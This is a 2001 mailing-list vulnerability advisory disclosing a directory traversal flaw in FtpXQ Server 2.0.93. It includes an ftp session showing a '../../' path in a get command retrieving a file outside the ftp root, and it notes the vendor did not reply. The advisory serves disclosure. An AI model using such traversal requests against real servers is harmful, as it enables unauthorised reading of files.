Date: Wed, 28 Feb 2001 18:32:19 -0500
From: [email protected]
To: [email protected]Subject: Vulnerability in FtpXQ Server
--Hushpart_boundary_BPNgzGoscFUgziKBVniilmeKiaESLmsd
Content-type: text/plain
----- Begin Hush Signed Message from [email protected] -----
Vulnerability in FtpXQ Server
Overview
FtpXQ Server 2.0.93 is an ftp server available from
http://www.datawizard.net and http://www.download.com. A vulnerability
exists which allows an attacker to download files outside the ftp root.
Details
The following is an illustration of the problem. An ftp root of
"c:\directory\directory" was used.
% ftp localhost
Connected to xxxxxxxxx.rh.rit.edu.
220 DataWizard Technologies' FtpXQ FTP Server. (Version 2.0.93).
User (xxxxxxxxx.rh.rit.edu:(none)): test
331 OK need password.
Password:
230 Welcome to DataWizard Technologies' FtpXQ FTP Server.
ftp> pwd
257 Remote directory is "/directory/directory/"
ftp> cd ..
550 Requested file action not taken---user does not have access.
ftp> get ../../autoexec.bat
200 OK
150 Opening data connection.
226 Transfer completed.
ftp: 383 bytes received in 0.06Seconds 6.38Kbytes/sec.
ftp>
Solution
No quick fix is possible.
Vendor Status
DataWizard Technologies, Inc. was contacted via <[email protected]>
on Tuesday, February 20, 2001. No reply was received.
- Joe Testa ( e-mail: [email protected] / AIM: LordSpankatron )
----- Begin Hush Signature v1.3 -----
C4CVJ/O5Iirb1y03vGfBsqdGexnj3/RUVEbhv0/w08ZTxg2pfofU7ZF+vHoXjaO8vxnV
b23thdtkJfxlJJjeQa8/z1WKCkSf8X66v5/a07YoqLjFOqcQvvUQ1Y0uizNWgLlxB76y
DRYXaEd1YR3zd4dPlpw9I9U8jXPkoxzrmDLq/wBHVLYXkV6Nu3jS7XSJNjthJB7phS5g
UcrDiHkHVQrgqkVnNxBtdWwzK9zwzYd6mlcE153NBLmGERMBd87nN6phYKpYZ3dQU/iS
8qkQcw4CBv8bwM3B0sBffs/YCJB1JyL7dxlxS7CDE2Kmps8PjeGY0JvrOtuXjz1rMLU3
eiAALpHjcavmp2e44+Yo3it32Sbe2kwHiYDDhDbhfeXhfUNTMz7rK/HrtazI4ohYiIVf
XkHU4XWoE9fhX5V72ffYuCz+uMzmKsjrbHHviG7SPRkdIbbOdww5TStGqRxNRYLFrP1Q
SyBsEsdXaPnIpiYnulAbq/L1521pwOEosKIqbwl4DAws
----- End Hush Signature v1.3 -----
This message has been signed with a Hush Digital Signature.
To verify the signature, please go to www.hush.com/tools
Free, encrypted, secure Web-based email at www.hushmail.com
--Hushpart_boundary_BPNgzGoscFUgziKBVniilmeKiaESLmsd--
IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages.
Get your FREE, totally secure email address at http://www.hushmail.com.
